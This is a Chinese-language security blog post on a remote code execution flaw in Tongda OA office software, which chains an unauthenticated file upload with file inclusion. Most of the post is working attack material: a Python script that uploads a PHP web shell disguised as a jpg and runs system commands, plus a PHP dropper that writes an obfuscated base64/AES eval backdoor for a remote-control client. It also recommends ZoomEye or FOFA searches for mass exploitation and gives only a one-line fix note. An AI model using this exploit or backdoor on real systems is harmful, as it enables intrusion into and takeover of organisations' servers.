<!DOCTYPE html>
<html  lang="en" >
    <head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, minimum-scale=1, initial-scale=1, maximum-scale=5, viewport-fit=cover">
    <title>通达OA之RCE | h00ls</title>
    <meta name="description" content="通达OA之RCE（批量刷洞）">
<meta property="og:type" content="article">
<meta property="og:title" content="通达OA之RCE">
<meta property="og:url" content="http://example.com/2020/03/19/%E9%80%9A%E8%BE%BEOA%E4%B9%8BRCE/index.html">
<meta property="og:site_name" content="h00ls">
<meta property="og:description" content="通达OA之RCE（批量刷洞）">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/images/img20200318111612.png">
<meta property="og:image" content="http://example.com/images/img20200318111630.png">
<meta property="og:image" content="http://example.com/images/img20200318111550-1.png">
<meta property="og:image" content="http://example.com/images/image-20200319121325031.png">
<meta property="og:image" content="http://example.com/images/image-202003191213503822.png">
<meta property="og:image" content="http://example.com/images/image-20200319135145445.png">
<meta property="og:image" content="http://example.com/images/image-20200319125232468.png">
<meta property="og:image" content="http://example.com/images/image-20200319133939748.png">
<meta property="article:published_time" content="2020-03-19T02:57:35.000Z">
<meta property="article:modified_time" content="2021-02-03T00:05:32.697Z">
<meta property="article:author" content="h00ls">
<meta property="article:tag" content="漏洞复现">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/images/img20200318111612.png">

    <link rel="alternate" type="application/atom+xml" href="/atom.xml">
    <link rel="icon" href="/images/favicon.png" type="image/x-icon">

    
<link rel="stylesheet" href="/css/common.min.css">



    
    
    
    
        <link href="//cdn.jsdelivr.net/npm/lightgallery.js@1.1.3/dist/css/lightgallery.min.css" rel="stylesheet">
    
    
    
<link rel="stylesheet" href="/css/iconfont.min.css">

    
<meta name="generator" content="Hexo 5.3.0"></head>

    <body>
        <header class="header header-fixture">
    <div class="profile-search-wrap flex sm:block">
        
        
        <div class="profile sm:text-center md:px-1 lg:px-3 sm:pb-4 sm:pt-6">
            <a id="avatar" role="link" href="https://github.com/h00ls" class="inline-block lg:w-16 lg:h-16 w-8 h-8 m-2" target="_blank" rel="noopener" rel="noreferrer" >
                <img src="https://www.gravatar.com/avatar/0bc83cb571cd1c50ba6f3e8a78ef1346?s=128" class="rounded-full" alt="avatar">
            </a>
            <h2 id="name" class="hidden lg:block">h00ls</h2>
            <h3 id="title" class="hidden xl:block">安全那些事</h3>
            
            <small id="location" class="hidden lg:block">
                <i class="iconfont icon-map-icon"></i>
                Sichuan, China
            </small>
            
        </div>
        
        
<div class="search flex-1 flex lg:inline-block sm:hidden lg:px-4 lg:mt-2 lg:mb-4 lg:w-full">
    <form id="search-form" class="my-auto flex-1 lg:border lg:border-solid lg:border-gray-200">
        <div class="input-group table bg-gray-100 lg:bg-white w-full">
            <input id="search-input" type="text" placeholder="Search" class="inline-block w-full bg-gray-100 lg:bg-white">
            <span class="table-cell">
                <button name="search tigger button" disabled>
                    <i class="iconfont icon-search m-2"></i>
                </button>
            </span>
        </div>
    </form>
        
<script id="search-teamplate" type="text/html" data-path="/content.json">
    <div>
        <div class="search-header bg-gray-400">
            <input id="actual-search-input" model="keyword" ref="input" class="inline-block w-full h-10 px-2 py-1" placeholder="Search" type="text">
        </div>
        <div class="search-result bg-gray-200">
            {{#each searchPosts}}
            <a href="/{{ path }}" class="result-item block px-2 pb-3 mb-1 pt-1 hover:bg-indigo-100">
                <i class="iconfont icon-file"></i>
                <h1 class="result-title inline font-medium text-lg">{{ title }}</h1>
                <p class="result-content text-gray-600 text-sm">{{{ text }}}</p>
            </a>
            {{/each}}
        </div>
    </div>
</script>

</div>


        <button name="menu toogle button" id="menu-toggle-btn" class="block sm:hidden p-3" role="button" aria-expanded="false">
            <i class="iconfont icon-hamburger"></i>
        </button>
    </div>
    <nav id="menu-nav" class="hidden sm:flex flex-col">
        
        
            <div class="menu-item menu-home" role="menuitem">
                <a href="/.">
                    <i class="iconfont icon-home" aria-hidden="true"></i>
                    <span class="menu-title">Home</span>
                </a>
            </div>
        
        
            <div class="menu-item menu-archives" role="menuitem">
                <a href="/archives">
                    <i class="iconfont icon-archive" aria-hidden="true"></i>
                    <span class="menu-title">Archives</span>
                </a>
            </div>
        
        
            <div class="menu-item menu-categories" role="menuitem">
                <a href="/categories">
                    <i class="iconfont icon-folder" aria-hidden="true"></i>
                    <span class="menu-title">Categories</span>
                </a>
            </div>
        
        
            <div class="menu-item menu-tags" role="menuitem">
                <a href="/tags">
                    <i class="iconfont icon-tag" aria-hidden="true"></i>
                    <span class="menu-title">Tags</span>
                </a>
            </div>
        
        
            <div class="menu-item menu-repository" role="menuitem">
                <a href="/repository">
                    <i class="iconfont icon-project" aria-hidden="true"></i>
                    <span class="menu-title">Repository</span>
                </a>
            </div>
        
        
            <div class="menu-item menu-links" role="menuitem">
                <a href="/links">
                    <i class="iconfont icon-friend" aria-hidden="true"></i>
                    <span class="menu-title">Links</span>
                </a>
            </div>
        
        
            <div class="menu-item menu-about" role="menuitem">
                <a href="/about">
                    <i class="iconfont icon-cup" aria-hidden="true"></i>
                    <span class="menu-title">About</span>
                </a>
            </div>
        
        
<div class="social-links flex sm:flex-col lg:hidden mt-5">
    
        <span class="social-item text-center">
            <a target="_blank" rel="noopener" href="https://github.com/h00ls">
                <i class="iconfont social-icon icon-github"></i>
                <span class="menu-title hidden lg:inline">menu.github</span>
            </a>
        </span>
    
        <span class="social-item text-center">
            <a href="/atom.xml">
                <i class="iconfont social-icon icon-rss"></i>
                <span class="menu-title hidden lg:inline">menu.rss</span>
            </a>
        </span>
    
</div>


    </nav>
</header>

        <section class="main-section">
            
    <main class="flex-1 px-4 py-12 md:px-5 lg:px-8 lg:py-4 relative min-h-screen">
    

    <article class="content article article-archives article-type-list" itemscope="">
        <header class="article-header">
            
    
        <h1 class="article-title text-lg" itemprop="name">
            通达OA之RCE
        </h1>
    



            <p class="article-meta mb-3 text-xs">
                <span class="article-date">
    <i class="iconfont icon-calendar-check"></i>
	<a href="/2020/03/19/%E9%80%9A%E8%BE%BEOA%E4%B9%8BRCE/" class="article-date">
	  <time datetime="2020-03-19T02:57:35.000Z" itemprop="datePublished">Mar 19</time>
	</a>
</span>
                

                
    <span class="article-tags">
    <i class="iconfont icon-tag"></i>
    <a class="article-tag-none-link" href="/tags/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/" rel="tag">漏洞复现</a>
  </span>


                <span class="_partial/post-comment"><i class="icon icon-comment"></i>
                    <a href="/2020/03/19/%E9%80%9A%E8%BE%BEOA%E4%B9%8BRCE/#comments" class="article-comment-link">
                        Comments
                    </a>
                </span>
                


    
        <span class="post-wordcount" itemprop="wordCount">Word Count: 790(words)</span>
    
	
	
    
        <span class="post-readcount" itemprop="timeRequired">Read Count: 3(minutes)</span>
    
	
	
    
		<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
		<span id="busuanzi_container_site_pv">PV: <span id="busuanzi_value_site_pv"></span></span>
		<span class="post-meta-divider"> | </span>
		<span id="busuanzi_container_site_uv">UV: <span id="busuanzi_value_site_uv"></span></span>

    
	
	


            </p>
        </header>
        <div class="marked-body article-body">
            <h1 id="通达OA之RCE（批量刷洞）"><a href="#通达OA之RCE（批量刷洞）" class="headerlink" title="通达OA之RCE（批量刷洞）"></a>通达OA之RCE（批量刷洞）</h1><a id="more"></a>

<h2 id="0x01-简介"><a href="#0x01-简介" class="headerlink" title="0x01 简介"></a>0x01 简介</h2><p>通达OA（Office Anywhere网络智能办公系统）是由北京通达信科科技有限公司自主研发的协同办公自动化软件，是与中国企业管理实践相结合形成的综合管理办公平台。</p>
<h2 id="0x02-漏洞影响"><a href="#0x02-漏洞影响" class="headerlink" title="0x02 漏洞影响"></a>0x02 漏洞影响</h2><p>通达OA V11版 &lt;= 11.3 20200103<br>通达OA 2017版 &lt;= 10.19 20190522<br>通达OA 2016版 &lt;= 9.13 20170710<br>通达OA 2015版 &lt;= 8.15 20160722<br>通达OA 2013增强版 &lt;= 7.25 20141211<br>通达OA 2013版 &lt;= 6.20 20141017</p>
<h2 id="0x03-漏洞危害"><a href="#0x03-漏洞危害" class="headerlink" title="0x03 漏洞危害"></a>0x03 漏洞危害</h2><p>能够远程执行计算机指令</p>
<h2 id="0x04-漏洞分析"><a href="#0x04-漏洞分析" class="headerlink" title="0x04 漏洞分析"></a>0x04 漏洞分析</h2><h3 id="文件上传漏洞"><a href="#文件上传漏洞" class="headerlink" title="文件上传漏洞"></a>文件上传漏洞</h3><p>漏洞文件位置：<code>isprit/im/upload</code></p>
<p>该文件存在逻辑漏洞，当<code>$P</code>非空的时候就不需要经过验证是否登录可以直接上传文件。</p>
<p><img src="/images/img20200318111612.png" alt="img"></p>
<p>但是上传之后的文件并没有在根目录下，因此无法直接使用，所以只有通过文件包含漏洞进行利用</p>
<p><img src="/images/img20200318111630.png" alt="img"></p>
<h3 id="文件包含漏洞"><a href="#文件包含漏洞" class="headerlink" title="文件包含漏洞"></a>文件包含漏洞</h3><p>位置：<code>ispirit/interface/gateway.php</code></p>
<p>上传的时候，只要没有参数P就无需验证</p>
<p><img src="/images/img20200318111550-1.png" alt="img"></p>
<h2 id="0x05-漏洞利用"><a href="#0x05-漏洞利用" class="headerlink" title="0x05 漏洞利用"></a>0x05 漏洞利用</h2><p>构造数据包，上传文件</p>
<p><img src="/images/image-20200319121325031.png" alt="image-20200319121325031"></p>
<p>构造数据包，执行系统命令</p>
<p><img src="/images/image-202003191213503822.png" alt="image-20200319121350382"></p>
<h2 id="0x06-漏洞验证与利用"><a href="#0x06-漏洞验证与利用" class="headerlink" title="0x06 漏洞验证与利用"></a>0x06 漏洞验证与利用</h2><h3 id="命令执行"><a href="#命令执行" class="headerlink" title="命令执行"></a>命令执行</h3><p>写了个简单的POC，可以适当修改成批量的POC检测，或者EXP。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line"></span><br><span class="line">upload_data = <span class="string">&quot;&quot;&quot;</span></span><br><span class="line"><span class="string">------WebKitFormBoundarypyfBh1YB4pV8McGB</span></span><br><span class="line"><span class="string">Content-Disposition: form-data; name=&quot;UPLOAD_MODE&quot;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">2</span></span><br><span class="line"><span class="string">------WebKitFormBoundarypyfBh1YB4pV8McGB</span></span><br><span class="line"><span class="string">Content-Disposition: form-data; name=&quot;P&quot;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">123</span></span><br><span class="line"><span class="string">------WebKitFormBoundarypyfBh1YB4pV8McGB</span></span><br><span class="line"><span class="string">Content-Disposition: form-data; name=&quot;DEST_UID&quot;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">1</span></span><br><span class="line"><span class="string">------WebKitFormBoundarypyfBh1YB4pV8McGB</span></span><br><span class="line"><span class="string">Content-Disposition: form-data; name=&quot;ATTACHMENT&quot;; filename=&quot;jpg&quot;</span></span><br><span class="line"><span class="string">Content-Type: image/jpeg</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">&lt;?php</span></span><br><span class="line"><span class="string">$command=$_POST[&#x27;cmd&#x27;];</span></span><br><span class="line"><span class="string">$wsh = new COM(&#x27;WScript.shell&#x27;);</span></span><br><span class="line"><span class="string">$exec = $wsh-&gt;exec(&quot;cmd /c &quot;.$command);</span></span><br><span class="line"><span class="string">$stdout = $exec-&gt;StdOut();</span></span><br><span class="line"><span class="string">$stroutput = $stdout-&gt;ReadAll();</span></span><br><span class="line"><span class="string">echo $stroutput;</span></span><br><span class="line"><span class="string">?&gt;</span></span><br><span class="line"><span class="string">------WebKitFormBoundarypyfBh1YB4pV8McGB--</span></span><br><span class="line"><span class="string">&quot;&quot;&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">uploadfile</span>(<span class="params">target</span>):</span></span><br><span class="line">    <span class="comment"># target = &quot;http://&quot; + target + &quot;:80/ispirit/im/upload.php&quot;</span></span><br><span class="line">    headers = &#123;</span><br><span class="line">        <span class="string">&quot;Host&quot;</span>: target,</span><br><span class="line">        <span class="string">&quot;User-Agent&quot;</span>: <span class="string">&quot;Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36&quot;</span>,</span><br><span class="line">        <span class="string">&quot;Content-Type&quot;</span>: <span class="string">&quot;multipart/form-data; boundary=----WebKitFormBoundarypyfBh1YB4pV8McGB&quot;</span></span><br><span class="line">    &#125;</span><br><span class="line">    </span><br><span class="line"></span><br><span class="line">    url = <span class="string">&quot;http://&quot;</span> + target + <span class="string">&quot;:80/ispirit/im/upload.php&quot;</span></span><br><span class="line"></span><br><span class="line">    resp = requests.post(url, headers=headers, data=upload_data)</span><br><span class="line">    jpgname = re.split(<span class="string">&#x27;[@ _ |]&#x27;</span>, <span class="built_in">str</span>(resp.content))</span><br><span class="line">    name = jpgname[<span class="number">2</span>] + <span class="string">&quot;/&quot;</span> + jpgname[<span class="number">3</span>] + <span class="string">&quot;.jpg&quot;</span></span><br><span class="line">    <span class="keyword">return</span> name</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">POC</span>(<span class="params">target, name</span>):</span></span><br><span class="line">    cmd_data = <span class="string">&#x27;json=&#123;&quot;url&quot;:&quot;/general/../../attach/im/&#x27;</span> + name + <span class="string">&#x27;&quot;&#125;&amp;cmd=net user&#x27;</span></span><br><span class="line">    headers = &#123;</span><br><span class="line">        <span class="string">&quot;Host&quot;</span>: target,</span><br><span class="line">        <span class="string">&quot;Content-Type&quot;</span>: <span class="string">&quot;application/x-www-form-urlencoded&quot;</span></span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    url = <span class="string">&quot;http://&quot;</span> + target + <span class="string">&quot;:80/mac/gateway.php&quot;</span></span><br><span class="line">    resp = requests.post(url, headers=headers, data=cmd_data)</span><br><span class="line">    <span class="keyword">if</span> <span class="string">&quot;No input&quot;</span> <span class="keyword">in</span> resp.text:</span><br><span class="line">        url = <span class="string">&quot;http://&quot;</span> + target + <span class="string">&quot;:80/ispirit/interface/gateway.php&quot;</span></span><br><span class="line">        resp = requests.post(url, headers=headers, data=cmd_data)</span><br><span class="line">    print(resp.text)</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">    target = sys.argv[<span class="number">1</span>] </span><br><span class="line">    name = uploadfile(target)</span><br><span class="line">    POC(target, name)</span><br></pre></td></tr></table></figure>
<p>执行效果如下</p>
<p><img src="/images/image-20200319135145445.png" alt="image-20200319121147574"></p>
<h3 id="一句话木马"><a href="#一句话木马" class="headerlink" title="一句话木马"></a>一句话木马</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$fp &#x3D; fopen(&#39;readme.php&#39;, &#39;w&#39;);</span><br><span class="line">$a &#x3D; base64_decode(&quot;PD9waHAKQGVycm9yX3JlcG9ydGluZygwKTsKc2Vzc2lvbl9zdGFydCgpOwppZiAoaXNzZXQoJF9HRVRbJ3Bhc3MnXSkpCnsKICAgICRrZXk9c3Vic3RyKG1kNSh1bmlxaWQocmFuZCgpKSksMTYpOwogICAgJF9TRVNTSU9OWydrJ109JGtleTsKICAgIHByaW50ICRrZXk7Cn0KZWxzZQp7CiAgICAka2V5PSRfU0VTU0lPTlsnayddOwoJJHBvc3Q9ZmlsZV9nZXRfY29udGVudHMoInBocDovL2lucHV0Iik7CglpZighZXh0ZW5zaW9uX2xvYWRlZCgnb3BlbnNzbCcpKQoJewoJCSR0PSJiYXNlNjRfIi4iZGVjb2RlIjsKCQkkcG9zdD0kdCgkcG9zdC4iIik7CgkJCgkJZm9yKCRpPTA7JGk8c3RybGVuKCRwb3N0KTskaSsrKSB7CiAgICAJCQkgJHBvc3RbJGldID0gJHBvc3RbJGldXiRrZXlbJGkrMSYxNV07IAogICAgCQkJfQoJfQoJZWxzZQoJewoJCSRwb3N0PW9wZW5zc2xfZGVjcnlwdCgkcG9zdCwgIkFFUzEyOCIsICRrZXkpOwoJfQogICAgJGFycj1leHBsb2RlKCd8JywkcG9zdCk7CiAgICAkZnVuYz0kYXJyWzBdOwogICAgJHBhcmFtcz0kYXJyWzFdOwoJY2xhc3MgQ3twdWJsaWMgZnVuY3Rpb24gX19jb25zdHJ1Y3QoJHApIHtldmFsKCRwLiIiKTt9fQoJQG5ldyBDKCRwYXJhbXMpOwp9Cj8+&quot;);</span><br><span class="line">fwrite($fp, $a);</span><br><span class="line">fclose($fp);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p>可以替换掉代码 <code>upload_data</code> 中的php代码 。然后需要访问一下图片木马，php代码才会被执行。执行后会创建一个木马，位置在<code>/ispirit/interface/</code>目录中，用冰蝎连接即可。</p>
<p><img src="/images/image-20200319125232468.png" alt="image-20200319125232468"></p>
<h2 id="0x07-修复"><a href="#0x07-修复" class="headerlink" title="0x07 修复"></a>0x07 修复</h2><p>目前已经给出修复两个文件的修复建议，及时更换两个文件即可。</p>
<h2 id="0x08-批量刷洞"><a href="#0x08-批量刷洞" class="headerlink" title="0x08 批量刷洞"></a>0x08 批量刷洞</h2><p>使用 <code>zoomeye</code> 或者 <code>fofa</code> 搜索关键词 <code>通达OA</code></p>
<p><img src="/images/image-20200319133939748.png" alt="image-20200319133939748"></p>
<h2 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h2><p><a target="_blank" rel="noopener" href="https://github.com/jas502n/OA-tongda-RCE">https://github.com/jas502n/OA-tongda-RCE</a></p>
<p><a target="_blank" rel="noopener" href="https://www.adminxe.com/1003.html">https://www.adminxe.com/1003.html</a></p>

        </div>
        
<blockquote class="copyright">
    <p><strong>Link to this article : </strong><a class="permalink" href="http://example.com/2020/03/19/%E9%80%9A%E8%BE%BEOA%E4%B9%8BRCE/">http://example.com/2020/03/19/通达OA之RCE/</a></p>
    <p><strong>This article is available under <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank" rel="noopener noreferrer">Attribution-NonCommercial-ShareAlike 4.0 International (CC BY-NC-SA 4.0)</a> License</strong></p>
</blockquote>


    </article>
    
    <section id="comments">
        
    </section>


    

</main>


<aside style="" id="sidebar" class="aside aside-fixture">
    <div class="toc-sidebar">
        <nav id="toc" class="article-toc">
            <h3 class="toc-title">Catalogue</h3>
            <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E9%80%9A%E8%BE%BEOA%E4%B9%8BRCE%EF%BC%88%E6%89%B9%E9%87%8F%E5%88%B7%E6%B4%9E%EF%BC%89"><span class="toc-number">1.</span> <span class="toc-text">通达OA之RCE（批量刷洞）</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#0x01-%E7%AE%80%E4%BB%8B"><span class="toc-number">1.1.</span> <span class="toc-text">0x01 简介</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x02-%E6%BC%8F%E6%B4%9E%E5%BD%B1%E5%93%8D"><span class="toc-number">1.2.</span> <span class="toc-text">0x02 漏洞影响</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x03-%E6%BC%8F%E6%B4%9E%E5%8D%B1%E5%AE%B3"><span class="toc-number">1.3.</span> <span class="toc-text">0x03 漏洞危害</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x04-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90"><span class="toc-number">1.4.</span> <span class="toc-text">0x04 漏洞分析</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E"><span class="toc-number">1.4.1.</span> <span class="toc-text">文件上传漏洞</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E"><span class="toc-number">1.4.2.</span> <span class="toc-text">文件包含漏洞</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x05-%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8"><span class="toc-number">1.5.</span> <span class="toc-text">0x05 漏洞利用</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x06-%E6%BC%8F%E6%B4%9E%E9%AA%8C%E8%AF%81%E4%B8%8E%E5%88%A9%E7%94%A8"><span class="toc-number">1.6.</span> <span class="toc-text">0x06 漏洞验证与利用</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C"><span class="toc-number">1.6.1.</span> <span class="toc-text">命令执行</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%B8%80%E5%8F%A5%E8%AF%9D%E6%9C%A8%E9%A9%AC"><span class="toc-number">1.6.2.</span> <span class="toc-text">一句话木马</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x07-%E4%BF%AE%E5%A4%8D"><span class="toc-number">1.7.</span> <span class="toc-text">0x07 修复</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x08-%E6%89%B9%E9%87%8F%E5%88%B7%E6%B4%9E"><span class="toc-number">1.8.</span> <span class="toc-text">0x08 批量刷洞</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8F%82%E8%80%83"><span class="toc-number">1.9.</span> <span class="toc-text">参考</span></a></li></ol></li></ol>
        </nav>
    </div>
</aside>





        </section>
        <footer class="hidden lg:block fixed bottom-0 left-0 sm:w-1/12 lg:w-1/6 bg-gray-100 z-40">
    
    <div class="footer-social-links">
        
            <a target="_blank" rel="noopener" href="https://github.com/h00ls">
                <i class="iconfont icon-github"></i>
            </a>
        
            <a href="/atom.xml">
                <i class="iconfont icon-rss"></i>
            </a>
        
    </div>
    
    
</footer>

        <div id="mask" class="hidden mask fixed inset-0 bg-gray-900 opacity-75 z-40"></div>
        <div id="search-view-container" class="hidden shadow-xl"></div>
        
<script src="/js/dom-event.min.js"></script>

<script src="//cdn.jsdelivr.net/npm/yox@1.0.0-alpha.121/dist/standard/prod/yox.min.js"></script>


<script src="/js/search.min.js"></script>



    <script src="//cdn.jsdelivr.net/npm/lightgallery.js@1.1.3/dist/js/lightgallery.min.js"></script>
    
<script src="/js/light-gallery.min.js"></script>





    </body>
</html>
